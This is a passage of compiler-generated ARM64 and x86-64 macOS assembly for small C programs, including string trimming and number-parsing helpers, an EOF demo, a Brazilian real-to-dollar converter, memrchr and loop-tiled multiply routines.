[x8, x9, lsl #3] bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: b LBB1_6 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB1_1 LBB1_6: ldr w0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _trim ; -- Begin function trim .p2align 2 _trim: ; @trim .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldrsb w8, [x8] subs w8, w8, #10 cset w8, eq mov w9, #1 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB2_5 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #8] ldrsb w8, [x8] subs w8, w8, #32 cset w8, eq mov w9, #1 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB2_5 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #8] ldrsb w8, [x8] subs w8, w8, #9 cset w8, eq mov w9, #1 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB2_5 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #8] ldrsb w8, [x8] subs w8, w8, #13 cset w8, eq str w8, [sp, #4] ; 4-byte Folded Spill b LBB2_5 LBB2_5: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB2_7 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #8] add x8, x8, #1 str x8, [sp, #8] b LBB2_1 LBB2_7: ldr x0, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _to_lower ; -- Begin function to_lower .p2align 2 _to_lower: ; @to_lower .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] str x8, [sp] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] ldrb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldr x8, [sp] ldrsb w0, [x8] bl _tolower ldr x8, [sp] strb w0, [x8] ldr x8, [sp] add x8, x8, #1 str x8, [sp] b LBB3_1 LBB3_3: ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _number ; -- Begin function number .p2align 2 _number: ; @number .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str x0, [sp, #40] str x1, [sp, #32] str wzr, [sp, #28] str wzr, [sp, #24] b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #32] ldrsb w8, [x8] subs w8, w8, #48 cset w8, lt mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB4_3 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #32] ldrsb w8, [x8] subs w8, w8, #57 cset w8, le str w8, [sp, #20] ; 4-byte Folded Spill b LBB4_3 LBB4_3: ; in Loop: Header=BB4_1 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB4_5 b LBB4_4 LBB4_4: ; in Loop: Header=BB4_1 Depth=1 ldr w8, [sp, #28] mov w9, #10 mul w8, w8, w9 ldr x9, [sp, #32] add x10, x9, #1 str x10, [sp, #32] ldrsb w9, [x9] subs w9, w9, #48 add w8, w8, w9 str w8, [sp, #28] ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB4_1 LBB4_5: ldr w8, [sp, #24] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB4_7 b LBB4_6 LBB4_6: ldr w8, [sp, #28] ldr x9, [sp, #40] str w8, [x9] ldr x8, [sp, #32] str x8, [sp, #8] ; 8-byte Folded Spill b LBB4_8 LBB4_7: mov x8, #0 str x8, [sp, #8] ; 8-byte Folded Spill b LBB4_8 LBB4_8: ldr x0, [sp, #8] ; 8-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _number64 ; -- Begin function number64 .p2align 2 _number64: ; @number64 .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str x0, [sp, #40] str x1, [sp, #32] str xzr, [sp, #24] str wzr, [sp, #20] b LBB5_1 LBB5_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #32] ldrsb w8, [x8] subs w8, w8, #48 cset w8, lt mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB5_3 b LBB5_2 LBB5_2: ; in Loop: Header=BB5_1 Depth=1 ldr x8, [sp, #32] ldrsb w8, [x8] subs w8, w8, #57 cset w8, le str w8, [sp, #16] ; 4-byte Folded Spill b LBB5_3 LBB5_3: ; in Loop: Header=BB5_1 Depth=1 ldr w8, [sp, #16] ; 4-byte Folded Reload tbz w8, #0, LBB5_5 b LBB5_4 LBB5_4: ; in Loop: Header=BB5_1 Depth=1 ldr x8, [sp, #24] mov x9, #10 mul x8, x8, x9 ldr x9, [sp, #32] add x10, x9, #1 str x10, [sp, #32] ldrsb w9, [x9] subs w9, w9, #48 add x8, x8, w9, sxtw str x8, [sp, #24] ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB5_1 LBB5_5: ldr w8, [sp, #20] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB5_7 b LBB5_6 LBB5_6: ldr x8, [sp, #24] ldr x9, [sp, #40] str x8, [x9] ldr x8, [sp, #32] str x8, [sp, #8] ; 8-byte Folded Spill b LBB5_8 LBB5_7: mov x8, #0 str x8, [sp, #8] ; 8-byte Folded Spill b LBB5_8 LBB5_8: ldr x0, [sp, #8] ; 8-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _bit_count ## -- Begin function bit_count .p2align 4, 0x90 _bit_count: ## @bit_count .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl $0, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -4(%rbp) je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -4(%rbp), %eax shrl $1, %eax movl %eax, -4(%rbp) movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_3: movl -8(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _string_index ## -- Begin function string_index .p2align 4, 0x90 _string_index: ## @string_index .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movl $0, -24(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -24(%rbp), %eax cmpl -20(%rbp), %eax jge LBB1_6 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rdi movq -16(%rbp), %rax movslq -24(%rbp), %rcx movq (%rax,%rcx,8), %rsi callq _strcmp cmpl $0, %eax jne LBB1_4 ## %bb.3: jmp LBB1_6 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_5 LBB1_5: ## in Loop: Header=BB1_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB1_1 LBB1_6: movl -24(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _trim ## -- Begin function trim .p2align 4, 0x90 _trim: ## @trim .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax movsbl (%rax), %ecx movb $1, %al cmpl $10, %ecx movb %al, -9(%rbp) ## 1-byte Spill je LBB2_5 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movq -8(%rbp), %rax movsbl (%rax), %ecx movb $1, %al cmpl $32, %ecx movb %al, -9(%rbp) ## 1-byte Spill je LBB2_5 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movq -8(%rbp), %rax movsbl (%rax), %ecx movb $1, %al cmpl $9, %ecx movb %al, -9(%rbp) ## 1-byte Spill je LBB2_5 ## %bb.4: ## in Loop: Header=BB2_1 Depth=1 movq -8(%rbp), %rax movsbl (%rax), %eax cmpl $13, %eax sete %al movb %al, -9(%rbp) ## 1-byte Spill LBB2_5: ## in Loop: Header=BB2_1 Depth=1 movb -9(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB2_6 jmp LBB2_7 LBB2_6: ## in Loop: Header=BB2_1 Depth=1 movq -8(%rbp), %rax addq $1, %rax movq %rax, -8(%rbp) jmp LBB2_1 LBB2_7: movq -8(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _to_lower ## -- Begin function to_lower .p2align 4, 0x90 _to_lower: ## @to_lower .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax cmpb $0, (%rax) je LBB3_3 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movq -16(%rbp), %rax movsbl (%rax), %edi callq _tolower movb %al, %cl movq -16(%rbp), %rax movb %cl, (%rax) movq -16(%rbp), %rax addq $1, %rax movq %rax, -16(%rbp) jmp LBB3_1 LBB3_3: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _number ## -- Begin function number .p2align 4, 0x90 _number: ## @number .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl $0, -20(%rbp) movl $0, -24(%rbp) LBB4_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $48, %ecx movb %al, -25(%rbp) ## 1-byte Spill jl LBB4_3 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movq -16(%rbp), %rax movsbl (%rax), %eax cmpl $57, %eax setle %al movb %al, -25(%rbp) ## 1-byte Spill LBB4_3: ## in Loop: Header=BB4_1 Depth=1 movb -25(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB4_4 jmp LBB4_5 LBB4_4: ## in Loop: Header=BB4_1 Depth=1 imull $10, -20(%rbp), %eax movq -16(%rbp), %rcx movq %rcx, %rdx addq $1, %rdx movq %rdx, -16(%rbp) movsbl (%rcx), %ecx subl $48, %ecx addl %ecx, %eax movl %eax, -20(%rbp) movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB4_1 LBB4_5: cmpl $0, -24(%rbp) jle LBB4_7 ## %bb.6: movl -20(%rbp), %ecx movq -8(%rbp), %rax movl %ecx, (%rax) movq -16(%rbp), %rax movq %rax, -40(%rbp) ## 8-byte Spill jmp LBB4_8 LBB4_7: xorl %eax, %eax ## kill: def $rax killed $eax movq %rax, -40(%rbp) ## 8-byte Spill jmp LBB4_8 LBB4_8: movq -40(%rbp), %rax ## 8-byte Reload popq %rbp retq .cfi_endproc ## -- End function .globl _number64 ## -- Begin function number64 .p2align 4, 0x90 _number64: ## @number64 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq $0, -24(%rbp) movl $0, -28(%rbp) LBB5_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $48, %ecx movb %al, -29(%rbp) ## 1-byte Spill jl LBB5_3 ## %bb.2: ## in Loop: Header=BB5_1 Depth=1 movq -16(%rbp), %rax movsbl (%rax), %eax cmpl $57, %eax setle %al movb %al, -29(%rbp) ## 1-byte Spill LBB5_3: ## in Loop: Header=BB5_1 Depth=1 movb -29(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB5_4 jmp LBB5_5 LBB5_4: ## in Loop: Header=BB5_1 Depth=1 imulq $10, -24(%rbp), %rax movq -16(%rbp), %rcx movq %rcx, %rdx addq $1, %rdx movq %rdx, -16(%rbp) movsbl (%rcx), %ecx subl $48, %ecx movslq %ecx, %rcx addq %rcx, %rax movq %rax, -24(%rbp) movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB5_1 LBB5_5: cmpl $0, -28(%rbp) jle LBB5_7 ## %bb.6: movq -24(%rbp), %rcx movq -8(%rbp), %rax movq %rcx, (%rax) movq -16(%rbp), %rax movq %rax, -40(%rbp) ## 8-byte Spill jmp LBB5_8 LBB5_7: xorl %eax, %eax ## kill: def $rax killed $eax movq %rax, -40(%rbp) ## 8-byte Spill jmp LBB5_8 LBB5_8: movq -40(%rbp), %rax ## 8-byte Reload popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/123803.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _getchar adds w8, w0, #1 cset w10, ne mov x9, sp ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp mov x8, #-1 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "We will see the value of boolean values : %d\n" l_.str.1: ; @.str.1 .asciz "This is the value of EOF, %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _getchar cmpl $-1, %eax setne %al andb $1, %al movzbl %al, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movl $4294967295, %esi ## imm = 0xFFFFFFFF movb $0, %al callq _printf xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "We will see the value of boolean values : %d\n" L_.str.1: ## @.str.1 .asciz "This is the value of EOF, %d\n" .subsections_via_symbols
the_stack_data/176704999.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _pointer_array_of_ints_test ; -- Begin function pointer_array_of_ints_test .p2align 2 _pointer_array_of_ints_test: ; @pointer_array_of_ints_test .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] ldr w8, [x8, #4] adrp x9, _int_pointer_val_arg_second_value_in_array@GOTPAGE ldr x9, [x9, _int_pointer_val_arg_second_value_in_array@GOTPAGEOFF] str w8, [x9] add sp, sp, #16 ret .cfi_endproc ; -- End function .comm _int_pointer_val_arg_second_value_in_array,4,2 ; @int_pointer_val_arg_second_value_in_array .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _pointer_array_of_ints_test ## -- Begin function pointer_array_of_ints_test .p2align 4, 0x90 _pointer_array_of_ints_test: ## @pointer_array_of_ints_test .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movl 4(%rax), %ecx movq _int_pointer_val_arg_second_value_in_array@GOTPCREL(%rip), %rax movl %ecx, (%rax) popq %rbp retq .cfi_endproc ## -- End function .comm _int_pointer_val_arg_second_value_in_array,4,2 ## @int_pointer_val_arg_second_value_in_array .subsections_via_symbols
the_stack_data/122014876.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-20] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF str x0, [sp, #16] ; 8-byte Folded Spill bl _scanf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldr x0, [sp, #16] ; 8-byte Folded Reload mov x9, sp sub x8, x29, #12 str x8, [x9] bl _scanf ldur s0, [x29, #-8] ldur s1, [x29, #-12] fmul s0, s0, s1 stur s0, [x29, #-16] ldur s0, [x29, #-16] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldur w0, [x29, #-20] ; 4-byte Folded Reload ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "----CONVERSAO DE REAL PARA DOLAR----\n" l_.str.1: ; @.str.1 .asciz "Digite o valor em R$: " l_.str.2: ; @.str.2 .asciz "%f" l_.str.3: ; @.str.3 .asciz "Digite o valor da cotacao do dolar: " l_.str.4: ; @.str.4 .asciz "O valor correspondente em dolar eh: %.2f\n\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi leaq -12(%rbp), %rsi movb $0, %al callq _scanf movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero mulss -12(%rbp), %xmm0 movss %xmm0, -16(%rbp) movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str.4(%rip), %rdi movb $1, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "----CONVERSAO DE REAL PARA DOLAR----\n" L_.str.1: ## @.str.1 .asciz "Digite o valor em R$: " L_.str.2: ## @.str.2 .asciz "%f" L_.str.3: ## @.str.3 .asciz "Digite o valor da cotacao do dolar: " L_.str.4: ## @.str.4 .asciz "O valor correspondente em dolar eh: %.2f\n\n" .subsections_via_symbols
the_stack_data/97013295.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _memrchr ; -- Begin function memrchr .p2align 2 _memrchr: ; @memrchr .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str x0, [sp, #32] str w1, [sp, #28] str x2, [sp, #16] ldr x8, [sp, #32] str x8, [sp, #8] ldr w8, [sp, #28] and w8, w8, #0xff str w8, [sp, #28] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x9, x8, #1 str x9, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #8] ldr x9, [sp, #16] ldrb w8, [x8, x9] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldr x8, [sp, #8] ldr x9, [sp, #16] add x8, x8, x9 str x8, [sp, #40] b LBB0_6 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_5: ; kill: def $x8 killed $xzr str xzr, [sp, #40] b LBB0_6 LBB0_6: ldr x0, [sp, #40] add sp, sp, #48 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _memrchr ## -- Begin function memrchr .p2align 4, 0x90 _memrchr: ## @memrchr .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq %rdx, -32(%rbp) movq -16(%rbp), %rax movq %rax, -40(%rbp) movl -20(%rbp), %eax ## kill: def $al killed $al killed $eax movzbl %al, %eax movl %eax, -20(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rax movq %rax, %rcx addq $-1, %rcx movq %rcx, -32(%rbp) cmpq $0, %rax je LBB0_5 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -40(%rbp), %rax movq -32(%rbp), %rcx movzbl (%rax,%rcx), %eax cmpl -20(%rbp), %eax jne LBB0_4 ## %bb.3: movq -40(%rbp), %rax addq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB0_6 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_5: movq $0, -8(%rbp) LBB0_6: movq -8(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/1087836.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _orig ; -- Begin function orig .p2align 2 _orig: ; @orig .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str w0, [sp, #44] str w1, [sp, #40] str x2, [sp, #32] str x3, [sp, #24] str x4, [sp, #16] str wzr, [sp, #12] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldr w8, [sp, #12] ldr w9, [sp, #44] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #8] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldr x8, [sp, #24] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #16] ldrsw x10, [sp, #8] ldr w9, [x9, x10, lsl #2] mul w10, w8, w9 ldr x8, [sp, #32] ldr w9, [sp, #12] ldr w11, [sp, #8] add w9, w9, w11 add x9, x8, w9, sxtw #2 ldr w8, [x9] add w8, w8, w10 str w8, [x9] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_1 LBB0_8: add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _skewed ; -- Begin function skewed .p2align 2 _skewed: ; @skewed .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str w0, [sp, #44] str w1, [sp, #40] str x2, [sp, #32] str x3, [sp, #24] str x4, [sp, #16] str wzr, [sp, #8] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldr w8, [sp, #8] ldr w9, [sp, #40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_8 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] str w8, [sp, #12] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #12] ldr w9, [sp, #8] ldr w10, [sp, #44] add w9, w9, w10 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_6 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 ldr x8, [sp, #24] ldr w9, [sp, #12] ldr w10, [sp, #8] subs w9, w9, w10 ldr w8, [x8, w9, sxtw #2] ldr x9, [sp, #16] ldrsw x10, [sp, #8] ldr w9, [x9, x10, lsl #2] mul w10, w8, w9 ldr x8, [sp, #32] ldrsw x9, [sp, #12] add x9, x8, x9, lsl #2 ldr w8, [x9] add w8, w8, w10 str w8, [x9] b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB1_3 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB1_1 LBB1_8: add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _tiled ; -- Begin function tiled .p2align 2 _tiled: ; @tiled .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str w0, [sp, #44] str w1, [sp, #40] str x2, [sp, #32] str x3, [sp, #24] str x4, [sp, #16] ldr w8, [sp, #40] subs w8, w8, #1 str w8, [sp, #12] b LBB2_1 LBB2_1: ; =>This Loop Header: Depth=1 ; Child Loop BB2_3 Depth 2 ; Child Loop BB2_7 Depth 3 ; Child Loop BB2_9 Depth 4 ; Child Loop BB2_17 Depth 3 ; Child Loop BB2_19 Depth 4 ; Child Loop BB2_27 Depth 3 ; Child Loop BB2_29 Depth 4 ldr w8, [sp, #12] adrp x9, _T@PAGE ldr w9, [x9, _T@PAGEOFF] subs w9, w9, #1 subs w8, w8, w9 cset w8, lo tbnz w8, #0, LBB2_39 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #12] adrp x9, _T@PAGE ldr w9, [x9, _T@PAGEOFF] subs w8, w8, w9 add w8, w8, #1 str w8, [sp, #8] b LBB2_3 LBB2_3: ; Parent Loop BB2_1 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB2_7 Depth 3 ; Child Loop BB2_9 Depth 4 ; Child Loop BB2_17 Depth 3 ; Child Loop BB2_19 Depth 4 ; Child Loop BB2_27 Depth 3 ; Child Loop BB2_29 Depth 4 ldr w8, [sp, #8] ldr w9, [sp, #12] ldr w10, [sp, #44] add w9, w9, w10 add w9, w9, #1 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB2_37 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB2_15 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #12] ldr w10, [sp, #44] add w9, w9, w10 adrp x10, _T@PAGE ldr w10, [x10, _T@PAGEOFF] subs w9, w9, w10 subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB2_15 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] str w8, [sp, #4] b LBB2_7 LBB2_7: ; Parent Loop BB2_1 Depth=1 ; Parent Loop BB2_3 Depth=2 ; => This Loop Header: Depth=3 ; Child Loop BB2_9 Depth 4 